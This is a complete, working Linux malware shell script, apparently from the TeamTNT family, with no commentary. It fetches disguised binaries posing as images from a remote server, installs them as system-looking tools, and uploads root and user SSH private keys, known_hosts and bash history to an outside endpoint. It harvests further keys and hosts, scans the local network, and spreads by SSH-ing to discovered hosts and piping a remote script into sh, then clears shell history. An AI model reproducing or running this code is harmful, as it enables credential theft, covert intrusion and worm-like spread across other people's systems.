#!/bin/sh

$(curl -s -k -o /dev/null https://iplogger.org/1YL3f7 || wget -O /dev/null -q https://iplogger.org/1YL3f7 ) &

clear
echo '###################################################################'
echo '###################################################################'
curl -s ipv4.icanhazip.com
echo '###################################################################'
echo '###################################################################'
sleep 3

PWNWITHTHISLINK="https://iplogger.org/2EKQc5"
RSAUPLOAD="http://sayhi.bplaced.net/uploads/index.php"

function setupmyapps(){
	
apt-get update --fix-missing 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
apt-get install -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apt-get install -y pnscan 2>/dev/null 1>/dev/null
yum install -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apt-get install --reinstall -y curl wget bash make gcc 2>/dev/null 1>/dev/null
yum reinstall -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apk update 2>/dev/null 1>/dev/null
apk add curl wget bash make gcc 2>/dev/null 1>/dev/null

function loadthisfile(){
GETFROM=$1
PUTITTO=$2

if [ -f "$PUTITTO" ]; then
chattr -i $PUTITTO 2>/dev/null 1>/dev/null
tntrecht -i $PUTITTO 2>/dev/null 1>/dev/null
rm -f $PUTITTO 2>/dev/null 1>/dev/null
fi

REFERER=$(cat /etc/ssh/sshd_config|grep -v grep | grep "Port "| awk '{print $2}')
WGETPARA="--max-redirect 5 --no-check-certificate --quiet"
CURLPARA="-L --max-redirs 5 --insecure --silent"

curl --referer $REFERER --user-agent TNTcurl $CURLPARA $GETFROM -o $PUTITTO || cur --referer $REFERER --user-agent TNTcurl $CURLPARA $GETFROM -o $PUTITTO || cdl --referer $REFERER --user-agent TNTcurl $CURLPARA $GETFROM -o $PUTITTO || TNTcurl --referer $REFERER --user-agent TNTcurl $CURLPARA $GETFROM -o $PUTITTO || wget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || wge --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || wdl --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || TNTwget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO

}	

if [ -f "/usr/sbin/docker-update" ]; then
echo 'FOUND: docker-update'
else
echo 'MISSING: docker-update'
loadthisfile http://85.214.149.236:443/sugarcrm/themes/default/images/default.jpg /usr/sbin/docker-update
chmod +x /usr/sbin/docker-update
/usr/sbin/docker-update
if [ ! -f "/usr/sbin/docker-update" ]; then
loadthisfile http://85.214.149.236:443/sugarcrm/themes/default/images/default.jpg /dev/shm/docker-update
chmod +x /dev/shm/docker-update
/dev/shm/docker-update
fi
fi
	
if [ -f "/usr/bin/tshd" ]; then
echo 'FOUND: tshd'
else
echo 'MISSING: tshd'
loadthisfile http://85.214.149.236:443/sugarcrm/themes/default/images/tshd.jpg /usr/bin/tshd
chmod +x /usr/bin/tshd
/usr/bin/tshd
fi

if [ -f "/usr/bin/kube" ]; then
echo 'FOUND: kube'
else
echo 'MISSING: kube'
loadthisfile http://85.214.149.236:443/sugarcrm/themes/default/images/kube.jpg /usr/bin/kube
chmod +x /usr/bin/kube
/usr/bin/kube
fi

if [ -f "/usr/bin/bioset" ]; then
echo 'FOUND: bioset'
else
echo 'MISSING: bioset'
loadthisfile http://85.214.149.236:443/sugarcrm/themes/default/images/bioset.jpg /usr/bin/bioset
chmod +x /usr/bin/bioset
/usr/bin/bioset
fi

if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
mkdir /tmp/ps
cd /tmp/ps
curl -kLs http://deb.debian.org/debian/pool/main/p/pnscan/pnscan_1.12+git20180612.orig.tar.gz -o /tmp/ps/.x112 || wget -q -O /tmp/ps/.x112 http://deb.debian.org/debian/pool/main/p/pnscan/pnscan_1.12+git20180612.orig.tar.gz
sleep 1
[ -f .x112 ] && tar xf /tmp/ps/.x112 -C /tmp/ps/ 2>/dev/null 1>/dev/null
cd pnscan-1.12 2>/dev/null 1>/dev/null
make lnx  2>/dev/null 1>/dev/null
cp pnscan /usr/bin/pnscan 2>/dev/null 1>/dev/null
chmod +x /usr/bin/pnscan 2>/dev/null 1>/dev/null
make install 2>/dev/null 1>/dev/null
cd .. 2>/dev/null 1>/dev/null
rm -rf .x112 ps 2>/dev/null 1>/dev/null
fi
}

function uploadthersa(){
curl -F "userfile=@/etc/ssh/sshd_config" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/id_rsa" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/id_rsa.pub" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/id_ed25519" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/id_ed25519.pub" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/authorized_keys" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.ssh/known_hosts" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/root/.bash_history" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/etc/hosts" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/id_rsa" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/id_rsa.pub" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/id_ed25519" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/id_ed25519.pub" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/authorized_keys" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.ssh/known_hosts" $RSAUPLOAD 2>/dev/null
curl -F "userfile=@/home/ubuntu/.bash_history" $RSAUPLOAD 2>/dev/null
history -c
}

function getsomelanssh(){
mkdir /home/hilde/.ssh/ -p 2>/dev/null 1>/dev/null
> /home/hilde/.ssh/known_hosts 2>/dev/null 1>/dev/null
ip route show | grep -v grep | grep "/" | awk '{print $1}' >> /home/hilde/.ssh/.ranges

for i in $(cat /home/hilde/.ssh/.ranges); do
echo "scanne "$i
pnscan $i 22 >> /home/hilde/.ssh/.known_hosts
done;
rm -f /home/hilde/.ssh/.ranges
cat /home/hilde/.ssh/.known_hosts | awk '{print $1}' >> /home/hilde/.ssh/known_hosts
rm -f /home/hilde/.ssh/.known_hosts
}


localgo() {
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  pl=$(
    echo "22"
    cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
  )
  sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -Ls $PWNWITHTHISLINK | sh || wget -q --max-redirect=2 -O- $PWNWITHTHISLINK | sh;"
          #ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl $SOURCEURL/init.sh | sh || wget -q --max-redirect=2 -O- $SOURCEURL/init.sh | sh;"
        done
      done
    done
  done
}



if [ ! -f "/dev/shm/.alsp" ]; then
setupmyapps
uploadthersa
getsomelanssh
localgo
echo 'lockfile' > /dev/shm/.alsp
tntrecht +i /dev/shm/.alsp || chattr +i /dev/shm/.alsp
else
echo "replay .. i know this server ..."
fi

history -c

